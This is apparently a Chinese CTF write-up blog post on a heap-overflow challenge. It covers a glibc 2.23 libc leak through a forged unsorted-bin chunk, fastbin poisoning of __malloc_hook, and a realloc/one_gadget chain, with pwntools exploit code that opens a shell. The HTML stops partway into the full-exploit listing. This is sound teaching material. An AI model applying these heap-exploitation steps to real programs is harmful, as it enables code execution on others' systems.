<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="HaveYouTall">



    <meta name="description" content="Binary | Blockchain | Crypto">


    <meta name="keywords" content="Binary | Blockchain | Crypto">


<title>复旦白泽暑期课程 heap 题 第一题 | HaveYouTall</title>



    <link rel="icon" href="/favicon.png">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 5.4.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">HaveYouTall&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag/">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">HaveYouTall&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag/">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6;    // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function () {
            tocbot.refresh(obj_merge(tocbot_default_config, { hasInnerContainers: true }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function () {
        tocbot.init(obj_merge(tocbot_default_config, { collapseDepth: 1 }));
    });

    function expandToc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, { collapseDepth: expanded ? 1 : DEPTH_MAX }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">复旦白泽暑期课程 heap 题 第一题</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">HaveYouTall</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">August 11, 2021&nbsp;&nbsp;22:17:52</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/ctf/">ctf</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="前情分析"><a href="#前情分析" class="headerlink" title="前情分析"></a>前情分析</h2><p>拿到这个题，显然是个标准的菜单题。</p>
<p>那么我们需要看看各个功能里面，具体的操作是什么样的。</p>
<span id="more"></span>

<p>ida里打开看到</p>
<ul>
<li><p><code>show_item</code> 函数可以输出一个堆块中的内容</p>
<p><img src="/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/image-20210811170723032.png" alt="image-20210811170723032"></p>
</li>
<li><p><code>add_item</code> 可以新分配一个堆块</p>
<p><img src="/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/image-20210811170702447.png" alt="image-20210811170702447"></p>
</li>
<li><p><code>change_item</code> 可以修改一个已经存在的堆块里面的内容，这里没有限制可以修改多少，因此有一个任意字节堆溢出的漏洞。</p>
<p><img src="/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/image-20210811170738810.png" alt="image-20210811170738810"></p>
</li>
<li><p><code>remove_item</code> 可以删除一个堆块 </p>
<p><img src="/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/image-20210811170756963.png" alt="image-20210811170756963"></p>
</li>
</ul>
<p>除了每个函数的功能之外，这个题目有另外需要注意的几点：</p>
<ul>
<li><p>首先，在给堆块读入数据的时候，读完之后会自动给下一个地址增加一个0，例如下图所示add功能中所示。</p>
<p><img src="/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/image-20210811170534500.png" alt="image-20210811170534500"></p>
</li>
<li><p>然后是，在remove功能中，其给free之后的指针置0，避免了直接的UAF</p>
</li>
<li><p>最后是需要注意分析寸堆块的结构长什么样（即<code>itemlist</code>和<code>qword_2020A8</code>到底是什么）。</p>
<p>首先我们看看add功能里面，v2显然代表了需要分配的堆空间大小，那<code>itemlist</code>的低4字节显然就是存这个堆块的大小了。然后<code>qword_2020A8</code>显然是malloc之后的指针列表。</p>
<p>然后我们再来看看，再bss段里面这两个东西的分布情况。</p>
<p><img src="/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/image-20210811171355883.png" alt="image-20210811171355883"></p>
<p>从图中可以看到，<code>itemlist</code> 后面8个字节就是<code>qword_2020A8</code>。那么我们再看每次分配的时候，<code>itemlist</code>和<code>qword_2020A8</code>的指针增长趋势可以看到，<code>itemlist</code>每次增长4个4字节，也就是2个8字节，那么刚好就跳到了<code>qword_2020A8</code> 之后8个字节的地方，从图上看就是2020E0的地方。此时我们暂时把这个地方标记为<code>itemlist1</code></p>
<p>然后再看<code>qword_2020A8</code>的增长，以此是长2个8字节，跟<code>itemlist</code>是一样的，所以它相当于跳到了<code>itemlist1</code>之后8个字节处，也就是2020E8的地方，正好不会与<code>itemlist1</code>所用的8字节空间重合。</p>
<p>因此分析到这里我们就可以很明显知道了，<code>itemlist</code>和<code>qword_2020A8</code>的作用，一个是存堆块分配的空间，一个是存堆块分配的指针。相当于这两个是一个结构体中的部分。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">item</span>&#123;</span></span><br><span class="line">	<span class="keyword">uint64_t</span> size; <span class="comment">//对应于8字节的itemlist，虽然只用了4字节存数字，但是按照增长方式来看，就是8个字节。</span></span><br><span class="line">	<span class="keyword">char</span> *content; <span class="comment">//一个8字节的指针，指向的是malloc出来的堆块，堆块里存的是content的内容</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<p>终于至此，我们分析完了这个题目程序的基本架构。</p>
<p><strong>安全检查</strong></p>
<p>下面我们先看看这个文件都开了哪些保护措施</p>
<p>结果如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br></pre></td></tr></table></figure>

<p>可以看到，这个题的限制下，首先如果可以弄到got表地址，那是可以写的。</p>
<p>不能直接unlink，因为开了PIE，除非能够搞到堆的基址。</p>
<h2 id="开搞"><a href="#开搞" class="headerlink" title="开搞"></a>开搞</h2><p>有了上面的分析之后，我们就可以开始思考怎么来做这个题了。</p>
<p>首先，我们这里基本上可以考虑是找个libc的one_gadget来做</p>
<blockquote>
<p>因为我刚入门，只能想到这个做法，不然再这么多保护的情况下，在好像还没法弄到栈里的前提下，好像不知道怎么弄ROPgadget来做。</p>
</blockquote>
<p><strong>堆做法的合理性的思考大致如下</strong></p>
<p>1、首先我们明确了需要libc的one_gadget，那么我们需要leak libc的基址，这个可以利用unsorted bin里面的fd和bk指针搞定，因为当只有一个堆块在unsorted bin中的时候，这个fd和bk是指向bin[0]的地方，也就是main arena + 88。因此这个leak思路暂时可行的。</p>
<blockquote>
<p>bin[0]就是unsorted bin。</p>
</blockquote>
<p>2、有了one_gadget的基址之后，就是怎么才能改变控制流。我们知道一个叫做<code>__malloc_hook</code>的函数，它的调用条件是在malloc调用的时候看看<code>__malloc_hook</code>中有没有函数的地址。因此我们可以考虑把libc的one_gadget地址写到这里，这样就可以在malloc的时候开shell了。</p>
<p>3、如何改写<code>__malloc_hook</code>就比较重要了。目前能想到的就是unlink，但是这个办法我测了一下有点问题，暂时不知道为什么（可能是libc2.23里面也会检查看fd出去再bk回来是不是自己么？）。然后我找了很多资料，发现其实可以利用fast bin的fd指针，让它指向<code>__malloc_hook</code>，然后在分配一个fast bin对应大小堆块的时候，可以把<code>__malloc_hook</code>所在的地址当成一个堆块分配出来，然后就可以在里面修改对应的信息了</p>
<h2 id="真实处理的思路-exp"><a href="#真实处理的思路-exp" class="headerlink" title="真实处理的思路 - exp"></a>真实处理的思路 - exp</h2><p>有了上面的分析之后，我们就可以开始按照这个流程写exp了</p>
<p>exp的具体思路如下：</p>
<ul>
<li>先对程序各个功能建模，如下所示：</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#r = remote(&#x27;106.14.112.162&#x27;,&#x27;10013&#x27;)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;libc-2.23.so&#x27;</span>)</span><br><span class="line"><span class="comment">#e = ELF(&#x27;./pwn&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>():</span></span><br><span class="line">    gdb.attach(r)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line">    r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">    <span class="comment">#r.recvuntil()</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">length,name</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">    r.send(<span class="built_in">str</span>(length))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">    r.send(name)</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span>(<span class="params">index,length,name</span>):</span></span><br><span class="line">	r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">	r.sendline(<span class="string">&quot;3&quot;</span>)</span><br><span class="line">	r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">	r.send(<span class="built_in">str</span>(index))</span><br><span class="line">	r.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">	r.send(<span class="built_in">str</span>(length))</span><br><span class="line">	r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">	r.send(name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">remove</span>(<span class="params">index</span>):</span></span><br><span class="line">	r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">	r.sendline(<span class="string">&quot;4&quot;</span>)</span><br><span class="line">	r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">	r.send(<span class="built_in">str</span>(index))</span><br></pre></td></tr></table></figure>

<ul>
<li><p>然后我们要leak libc。这个步骤没有想象中简单。</p>
<p><strong>错误示范</strong>：本来想先free掉一个大于0x80（加上meradata后的堆大小）的堆块，让其进入unsorted bin，然后再malloc出来，并给content内容为””一个空字符串，这样show()出来就能得到其内容，然而这个是不行的。我以为是“”空字符串的问题，会引入\x00，所以我就把前8个字节（fd）写成8B的字符a，然后一连串输出到后8字节（bk），结果居然后面8个字节的最低1个字节也被写成\x00了。于是我去找问题，在ida里面就看到了，读入之后，会将读入后的末尾加上一个0（在前情分析里提到过了）。可见这个程序就是防止你去这么leak，🐂。</p>
<p><strong>正确思路</strong>：这样的话我们就要想个别的办法来leak了。找了很多资料之后，我弄明白了。这个思路很巧妙，首先我们先分配一个小堆块（加上metadata就0x20就够），然后再分配两个堆块（要求这两个堆块加起来大小（包括他们的metadata）大于0x80就好）。</p>
<p>然后我们修改第一个小堆块，目的是让它把第二个堆块的头修改掉。</p>
<blockquote>
<p>这就是为什么第一个小堆块我说0x20就行，因为开大了没有必要</p>
</blockquote>
<p>我们需要把第二个堆块的头改成 00 和 0xnn，这里nn是第二个和第三个堆块合起来的大小（包括metadata），这样是为了伪造二三个堆块为一个堆块。</p>
<p>然后再把第二个堆块free掉，这样伪造的这个二三合体堆就会被放到unsorted bin里（所以之前说这两个合起来大小要大于0x80）。</p>
<p>而且此时，第三个堆块的指针还在，也就是unsorted bin的后半段其实是从外面可以访问了。</p>
<p>然后我们再申请一个跟最开始第二个堆块一样大的堆块，这个时候就会从unsorted bin里面分割出一部分分配，这就使得剩下的部分刚好就是原来的第三个堆块所指的位置，并且这个时候，它的fd和bk都是main arena + 88。</p>
<p>这样我们不需要写入数据，就有了想要的地址，并且不用再分配了，因为指针一直都在，没有free过。</p>
<p>然后只要把第三个堆块的内容数据就可以leak出libc的地址了</p>
<blockquote>
<p><strong>注意</strong>：这个地方还要记得再第三个堆块后面再申请一个小堆块，防止free伪造二三合体堆的时候，跟top chunk合并了。</p>
<p><strong>注意2</strong>：这里我们还需要main arena + 88的offset，这个其实很简单，gdb一下程序，然后找到libc的基址（Pwngdb（不是pwndbg噢~~~初学很容易看混的）在gdb的基础上给了libc指令，可以直接看），然后复制出来，再找到此时main arena + 88的真实地址，然后两个相减就是offset了。</p>
</blockquote>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 0 用于覆盖1的头部，伪造二三合体堆（二三指的下标为1和2的堆）</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 1</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 2 </span></span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;cccc&#x27;</span>) <span class="comment"># 3 垫一下，防止和top chunk 合并</span></span><br><span class="line"></span><br><span class="line">change(<span class="number">0</span>, <span class="number">0x19</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span> + <span class="string">b&#x27;\xe1&#x27;</span>) <span class="comment"># 将第一个堆块写上伪造数据，先写了0x18个随便的东西，然后就是第二个堆块（下标为1）的size字段，size大小写为0x70*2也就是0xe0，同时前一个块在使用，因此要写成0xe1。注意：这个数值根据申请的二三两个堆块（下标1、2）的大小来修改</span></span><br><span class="line">remove(<span class="number">1</span>) <span class="comment"># 二三合体堆（下标1、2）被free</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;aaaa&quot;</span>) <span class="comment"># 下标1重新分配回来 </span></span><br><span class="line">show() <span class="comment"># 此时下标2的堆还在unsorted bin里，但是指针没有free</span></span><br><span class="line">r.recvuntil(<span class="string">&quot;2 : &quot;</span>) <span class="comment"># pointer 2 is still point to #2 and #2 is still in unsorted bin</span></span><br><span class="line">libc_base = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - (<span class="number">0x7f1442c64b78</span> - <span class="number">0x7f14428a0000</span>) <span class="comment"># leak</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>有了libc之后，我们就是要改<code>__malloc_hook</code>了。</p>
<p><strong>错误思路</strong>：用unlink 来使得<code>__malloc_hook</code>的地址下写入one_gadget 。<strong>也有一种可能</strong>，就是我unlink理解不到位，到底要写什么到fd和bk写的有问题，<strong>这个可以再去考究一下</strong>。</p>
<p><strong>正确思路</strong>：我们需要弄一个fast bin里的堆块，然后对里面的内容进行修改。那么怎么能够对bin里面的，也就是free的堆块进行写操作呢？在这个题把指针还都清空的情况下。</p>
<p>显然我们可以继续用上面leak的思路。我们现在在unsorted bin中的一个堆块就是一个指针还可以用的堆块。正好大小是0x70（算上metadata），因此我们先拿出来再free掉，然后它就进到fast bin了。</p>
<p>这个时候，我们之前的第三个堆块（下标为2）的指针就指向fast bin里面的那个内容。</p>
<p>然后我们修改第三个堆块（下标为2）的fd字段的位置，改成<code>__malloc_hook</code>的地址。</p>
<p>这样我们再分配一个的时一样大小的（我这个做法里，他们是串在fast bin中0x70字段，所以我malloc 0x60）。</p>
<p>这样这个时候，fast bin里面还有一个块，这个块的地址是<code>__malloc_hook</code>，然后我们继续malloc 0x60，它则还会再fast bin的0x70字段去找，就会找到这个<code>__malloc_hook</code>以及其后面的0x70（前0x10是metadata）作为堆块，给其下标为5。</p>
<p><strong>重点中的重点</strong>：这里要注意，其实我在修改fast bin那个堆块的fd位置的时候，不能写<code>__malloc_hook</code>，因为首先我们知道前面有0x10是metadata，所以我们至少要把fd写为<code>__malloc_hook - 0x10</code>（因为目的是让<code>__malloc_hook</code>的地方是one_gadget）。但是这么写还是不行，分配不出来，会报错，然后我一直测试，发现就是<code>__malloc_hook - 0x23</code>成功了，可以分配出来，并且没有报错。看了很多的资料，大家也都是0x23，<strong>原因暂时还不知道</strong>。</p>
<p><strong>重点中的重点的重点</strong>：那么这样分配出来之后，在没用的地方放杂物，最后<code>__malloc_hook</code>的位置放one_gadget真的就行了吗？？？答案是否定的，因为one_gadget使用条件的原因，在这个情况下，4个one_gadget都不行…….然后我找了很多资料，有人说可以把控制流改成 <code>malloc</code> -&gt; <code>__malloc_hook</code> -&gt; <code>realloc</code> -&gt; <code>__realloc_hook</code> 因为realloc前面有很多push操作，可以控制栈的高度。</p>
<p><strong>下面我们来讲讲这个操作要怎么写</strong></p>
<p>首先我们找到realloc的offset，然后加上基址就好了。那么要实现上面的流程，我们要将<code>__malloc_hook</code>里面写成realloc的地址，然后在<code>__realloc_hook</code>里面再写上one_gadget。</p>
<blockquote>
<p><strong>注意</strong>：<code>__realloc_hook</code> 在 <code>__malloc_hook - 0x8</code> 的地方。</p>
</blockquote>
<p>然后这个做法我没有仔细去调栈的内容，就直接这么写用第二个one_gadget就拿到shell了。不过实际上，可以通过改变<code>__malloc_hook</code>中写的地址，来跳过realloc中的一些push操作，以此达到操作栈里面内容的效果。具体可以看看这个<a target="_blank" rel="noopener" href="http://pearcechn.top/2021/01/22/%E3%80%90pwn%E7%AC%94%E8%AE%B0%E3%80%91one_gadget%E7%9A%84%E9%99%90%E5%88%B6%E5%8F%8A%E5%88%A9%E7%94%A8/">博客，主要讲的one_gadget的限制和利用</a></p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">malloc_hook_addr = libc_base + libc.symbols[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">realloc_addr = libc_base + libc.symbols[<span class="string">&#x27;realloc&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(realloc_addr)</span><br><span class="line">one = [<span class="number">0x45226</span>, <span class="number">0x4527a</span>, <span class="number">0xf03a4</span>, <span class="number">0xf1247</span>]</span><br><span class="line">add(<span class="number">0x60</span>, <span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 4 ，这个操作把 unsorted bin 里面的内容取出来，其地址和下标2一样</span></span><br><span class="line">remove(<span class="number">4</span>) <span class="comment"># put 下标4 into fast bin</span></span><br><span class="line"><span class="comment">#p = p64(0)</span></span><br><span class="line"><span class="comment">#p += p64(0xd1)</span></span><br><span class="line">p = p64(malloc_hook_addr - <span class="number">0x23</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(malloc_hook_addr - <span class="number">0x23</span>)</span><br><span class="line"><span class="comment">#print hex(libc_base + one[0])</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;最开始想用unlink好像不太行，2.23可能也有检查</span></span><br><span class="line"><span class="string">p += p64(libc_base + one[0] - 0x10)</span></span><br><span class="line"><span class="string">print libc_base + one[0] - 0x10</span></span><br><span class="line"><span class="string">p += &#x27;d&#x27;*0xb0</span></span><br><span class="line"><span class="string">p += p64(0xd0)</span></span><br><span class="line"><span class="string">p += p64(0x80)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">change(<span class="number">2</span>, <span class="number">0x08</span>, p) <span class="comment"># 修改下标2的fd字段，也就是修改fast bin中下标4的fd</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 吧下标4从fast bin拿出来</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">add(<span class="number">0x60</span>, <span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># get malloc_hook -0x23 as #5</span></span><br><span class="line"></span><br><span class="line">change(<span class="number">5</span>, <span class="number">0xb</span> + <span class="number">0x8</span> + <span class="number">0x8</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0xb</span> + p64(libc_base + one[<span class="number">1</span>]) + p64(realloc_addr))</span><br><span class="line"><span class="comment"># 将malloc_hook -0x23的地方写成上述控制流对应的要求。</span></span><br></pre></td></tr></table></figure>

<ul>
<li><strong>最后</strong>：我们最后再调用一下malloc函数就能拿到shell了</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">r.send(<span class="built_in">str</span>(<span class="number">0x20</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="完整的exp"><a href="#完整的exp" class="headerlink" title="完整的exp"></a>完整的exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span 